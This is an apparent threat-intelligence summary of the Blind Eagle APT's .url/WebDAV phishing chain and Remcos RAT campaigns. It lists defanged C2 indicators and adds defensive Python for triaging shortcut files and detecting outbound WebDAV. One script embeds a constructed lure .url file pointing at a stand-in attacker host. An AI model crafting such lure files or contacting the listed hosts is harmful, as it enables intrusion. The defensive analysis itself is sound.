Full Report
Source: Check Point Research, "Blind Eagle: …And Justice for All". Excerpt: APT-C-36, also known as Blind Eagle, is a threat group that engages in both espionage and cybercrime. It primarily targets organizations in Colombia and other Latin American countries. Active since 2018, this Advanced Persistent Threat (APT) group focuses on government institutions, financial organizations, and critical infrastructure. Blind Eagle is known for employing […]
Analysis Summary
# Threat Actor: Blind Eagle (APT-C-36)
## Attribution & Identity
**Identification:** Advanced Persistent Threat (APT) group known as Blind Eagle, also tracked as APT-C-36.
**Origin:** Strongly suspected to originate from South America. Operating timezone identified as UTC-5, aligning with several South American countries.
**Nature:** Engages in both cyber espionage and cybercrime activities.
**Activity Span:** Active since 2018.
## Activity Summary
Blind Eagle has been running continuous campaigns since November 2024, primarily against Colombian institutions. The group rapidly incorporated a variant of the exploitation technique behind **CVE-2024-43451**, delivering malicious `.url` files just six days after Microsoft patched the vulnerability on November 12, 2024.
Recent campaigns have achieved high infection counts: one on or around December 19, 2024 hit more than 1,600 victims, an unusually large number for a group that otherwise runs tightly targeted operations. Earlier activity, such as "Operation fail" (March 2024), used phishing pages impersonating Colombian banks and collected more than 8,000 records of Personally Identifiable Information (PII).
## Tactics, Techniques & Procedures
- **Initial Access/Delivery:** Phishing emails carrying malicious payloads, often hosted on legitimate file-sharing platforms (Google Drive, Dropbox, Bitbucket, GitHub) so that the download itself looks benign.
- **Download Notification (Reconnaissance):** Malicious `.url` files that issue a WebDAV request as soon as the user interacts with the file in almost any way (right-click, delete, drag). The request tells the attacker that the lure reached a victim, and it fires even on systems patched against CVE-2024-43451.
- **Second-Stage Execution:** Opening the `.url` file sends a further WebDAV request that downloads and executes the next-stage payload.
- **Evasion:** Malicious executables are wrapped with the Packer-as-a-Service **HeartCrypt**.
- **Malware Chaining:** Several commodity RATs are dropped in stages, culminating in Remcos RAT for final command and control.
**Note on CVE-2024-43451:** The zero-day exploitation attributed to UAC-0194 leaked the victim's NTLMv2 hash through the same kind of minimal-interaction WebDAV request. Blind Eagle's variant reuses that trigger, but the article suggests it does **not** expose the NTLMv2 hash on patched systems; there it serves only as a notification that the lure was downloaded, ahead of the second-stage fetch. Patching therefore removes the hash disclosure, not the notification or the click-to-execute download.
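Added example (not code from the Check Point report): a triage script for Internet Shortcut (`.url`) files of the kind described above. It parses the INI-like format Windows uses for these files and flags `URL`, `IconFile` or `WorkingDirectory` values that point at a remote host, either as a UNC path (including the WebDAV mini-redirector forms `\\host@80\...` and `\\host@SSL\...`) or as a `file://` URL with a non-local host. Any such reference means Explorer or the WebClient service will reach out to that host when the shortcut is rendered or used. The two sample files, their hosts and paths are constructed for this example and are not indicators from the report.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample .url files (not from the report). 203.0.113.10 is a
# documentation address standing in for an attacker-controlled WebDAV host.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://203.0.113.10/share/invoice.pdf
IconFile=\\\\203.0.113.10@80\\share\\icon.ico
IconIndex=0
"""

BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.org/
IconFile=C:\\Windows\\System32\\shell32.dll
IconIndex=13
"""

# Fields whose value Windows resolves as a path, and hence may fetch remotely.
PATH_FIELDS = ("URL", "ICONFILE", "WORKINGDIRECTORY")


def parse_url_file(text: str) -> Dict[str, str]:
    """Parse the INI-like Internet Shortcut format into {KEY: value}.
    Only the [InternetShortcut] section is read; keys are upper-cased because
    Windows treats them case-insensitively."""
    fields: Dict[str, str] = {}
    section = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().upper()] = value.strip()
    return fields


def remote_host(value: str) -> Optional[Tuple[str, str]]:
    """Return (host, transport) if the value names a remote host, else None.
    UNC paths use SMB, or WebDAV when the host carries an @80 / @SSL tag;
    file:// URLs with a host are resolved as UNC paths by Windows."""
    if value.startswith("\\\\"):
        host = value[2:].split("\\", 1)[0]
        transport = "smb"
        if "@" in host:
            host, tag = host.split("@", 1)
            transport = "webdav-ssl" if tag.upper().startswith("SSL") else "webdav"
        return host, transport
    parsed = urlparse(value)
    if parsed.scheme == "file" and parsed.hostname and parsed.hostname.lower() != "localhost":
        return parsed.hostname, "unc"
    return None


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(text: str) -> Dict[str, object]:
    """Parse a .url file and report every field that reaches a remote host."""
    fields = parse_url_file(text)
    findings: List[Dict[str, object]] = []
    for key in PATH_FIELDS:
        if key not in fields:
            continue
        hit = remote_host(fields[key])
        if hit is None:
            continue
        host, transport = hit
        findings.append({"field": key, "host": host, "transport": transport,
                         "ip_literal": is_ip_literal(host)})
    return {"fields": fields, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for name, sample in (("lure", SAMPLE_URL_FILE), ("benign", BENIGN_URL_FILE)):
        result = triage(sample)
        print(name, "suspicious" if result["suspicious"] else "clean", result["findings"])
```

Run it over a quarantine folder of `.url` attachments; a remote `IconFile` is the field to watch, because the icon is resolved without the user ever opening the shortcut, while a remote `URL` only fires on click.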
## Targeting
- **Sectors:** Judicial institutions, general government entities, financial organizations, and critical infrastructure.
- **Geography:** Primarily targets Colombia; broader focus on Latin American countries.
- **Victims:** Over 1,600 victims tracked in a single December 2024 campaign, including Colombian judicial institutions and other public and private organizations.
## Tools & Infrastructure
- **Malware Families:**
  - .NET RAT variant (the report links it to PureCrypter)
  - NjRAT (historical/general arsenal)
  - AsyncRAT (historical/general arsenal)
  - **Remcos RAT** (final payload)
- **Packers/Obfuscation:** **HeartCrypt** (Packer-as-a-Service)
- **Delivery Platforms:** Google Drive, Dropbox, Bitbucket, GitHub.
- **Infrastructure (C2/Download), defanged as in the report:**
  - `62.60.226[.]64/file/` (Stage 2 download location)
  - `republicadominica2025[.]ip-ddns[.]com` (Stage 2 C&C)
  - `raw.githubusercontent[.]com/Oscarito20222/file/refs/heads/main/redtube.exe` (Stage 3 delivery, observed in the wild)
  - `elyeso.ip-ddns[.]com:30204` (Remcos C&C)
## Implications
Blind Eagle remains a significant, persistent threat because of its agility (it adopted the `.url`/WebDAV technique derived from CVE-2024-43451 within days of the patch) and its dual focus on espionage and cybercrime. The infection counts it reaches against government entities show how effectively it gains footholds in critical sectors in Latin America. Wrapping commodity malware in a professional packing service (HeartCrypt) lets the group keep well-known tools effective against defences.
## Mitigations
- **Endpoint Protection:** Deploy endpoint security that detects the listed malware families (Remcos, the PureCrypter-related loader, AsyncRAT, NjRAT) and the behaviour around them, in particular shortcut (`.url`) files in user download locations whose icon or target points at a remote host, and the WebClient service starting in response to such a file.
- **Vulnerability Management:** Patch CVE-2024-43451 and keep the patching cadence tight, but be clear about what the patch stops: it closes the NTLMv2 hash disclosure, while the `.url` notification request and the click-to-execute second-stage download still work on patched hosts, so patching alone does not neutralise this delivery chain.
- **Network Monitoring:** Monitor for WebDAV traffic that does not correspond to an approved internal share: outbound PROPFIND/OPTIONS requests from the Windows WebClient service (user agent `Microsoft-WebDAV-MiniRedir/...`) to public IP addresses or dynamic-DNS hostnames, especially in the seconds after a `.url` file is created or touched. Where WebDAV to the internet is not needed, disable the WebClient service and block outbound TCP 445 and WebDAV at the perimeter.
- **Defense against Phishing:** Train personnel on the social engineering used here (impersonation of local banks and judicial bodies) and on verification procedures for attachments and links from external sources, including files hosted on otherwise legitimate platforms such as Google Drive, Dropbox, Bitbucket and GitHub.
- **Authentication Hardening:** Require SMB signing and, where feasible, restrict outbound NTLM authentication (the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy) so that a leaked challenge cannot be relayed, with priority on privileged accounts.
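Added example of the network-monitoring check above, run over constructed egress-proxy log lines (example code, not from the Check Point report). The log format is a hypothetical key=value scheme and the `LINE_RE` pattern must be adapted to a real proxy; the source and destination addresses, the internal allowlist and the `lure-host.ip-ddns.com` hostname are all constructed, with only the `ip-ddns.com` suffix taken from the report's indicators. The rule fires on WebDAV requests (WebClient user agent, or a WebDAV-only method from any client) whose destination is neither an RFC 1918 address nor an approved internal share, and raises severity for dynamic-DNS destinations.

```python
import ipaddress
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed egress-proxy log lines (not from the report). 10.0.5.12 plays the
# role of an approved internal WebDAV server; the public addresses are
# documentation ranges; lure-host.ip-ddns.com is a made-up hostname.
SAMPLE_LOG = """\
2024-12-19T14:02:10Z src=10.20.30.41 dst=10.0.5.12 dport=80 method=PROPFIND ua="Microsoft-WebDAV-MiniRedir/10.0.19045" uri="/shares/finance/"
2024-12-19T14:02:11Z src=10.20.30.41 dst=203.0.113.10 dport=80 method=OPTIONS ua="Microsoft-WebDAV-MiniRedir/10.0.19045" uri="/file/"
2024-12-19T14:02:11Z src=10.20.30.41 dst=203.0.113.10 dport=80 method=PROPFIND ua="Microsoft-WebDAV-MiniRedir/10.0.19045" uri="/file/"
2024-12-19T14:02:15Z src=10.20.30.41 dst=198.51.100.7 dport=443 method=GET ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64)" uri="/index.html"
2024-12-19T14:03:02Z src=10.20.30.77 dst=lure-host.ip-ddns.com dport=30204 method=PROPFIND ua="Microsoft-WebDAV-MiniRedir/10.0.22631" uri="/file/"
"""

# Hypothetical key=value proxy format; adapt to the real log source.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) '
    r'method=(?P<method>[A-Z]+) ua="(?P<ua>[^"]*)" uri="(?P<uri>[^"]*)"$'
)

# The Windows WebDAV mini-redirector (WebClient service) identifies itself
# with this user-agent prefix.
MINIREDIR_UA = "Microsoft-WebDAV-MiniRedir/"
# Methods that only a WebDAV client sends (OPTIONS is generic HTTP, so it
# counts only together with the WebClient user agent).
DAV_ONLY_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}
# Approved internal WebDAV endpoints (constructed for this example).
ALLOWLIST = {"10.0.5.12", "dav.corp.example"}
# Explicit RFC 1918 / local ranges; Python's is_private would also treat the
# documentation ranges used in the sample as private, so they are listed by hand.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                 "127.0.0.0/8", "169.254.0.0/16")]
# Dynamic-DNS suffixes that raise severity; ip-ddns.com appears in the
# report's C2 hostnames, the others are well-known providers.
DYNDNS_SUFFIXES = (".ip-ddns.com", ".duckdns.org", ".no-ip.org")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def is_internal(dst: str) -> bool:
    """True for allowlisted hosts and private addresses; bare hostnames are
    treated as external unless allowlisted."""
    if dst in ALLOWLIST:
        return True
    try:
        addr = ipaddress.ip_address(dst)
    except ValueError:
        return False
    return any(addr in net for net in PRIVATE_NETS)


def classify(rec: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert for WebDAV traffic to a non-approved destination."""
    from_miniredir = rec["ua"].startswith(MINIREDIR_UA)
    dav_method = rec["method"] in DAV_ONLY_METHODS
    if not (from_miniredir or dav_method) or is_internal(rec["dst"]):
        return None
    severity = "high" if rec["dst"].lower().endswith(DYNDNS_SUFFIXES) else "medium"
    reason = ("WebClient WebDAV request to external host" if from_miniredir
              else "WebDAV-only method to external host")
    return {"ts": rec["ts"], "src": rec["src"], "dst": rec["dst"],
            "dport": rec["dport"], "method": rec["method"],
            "severity": severity, "reason": reason}


def detect(log_text: str) -> List[Dict[str, str]]:
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        alert = classify(rec)
        if alert is not None:
            alerts.append(alert)
    return alerts


def summarize(alerts: List[Dict[str, str]]) -> Counter:
    """Collapse alerts into (src, dst) pairs with counts, so the notification
    beacon and the payload fetch to the same host show as one relationship."""
    return Counter((a["src"], a["dst"]) for a in alerts)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print(summarize(found))
```

The allowlist is what keeps this rule quiet on networks that legitimately use WebDAV (SharePoint, internal file shares); without it, the WebClient user-agent match alone would page on every mapped drive.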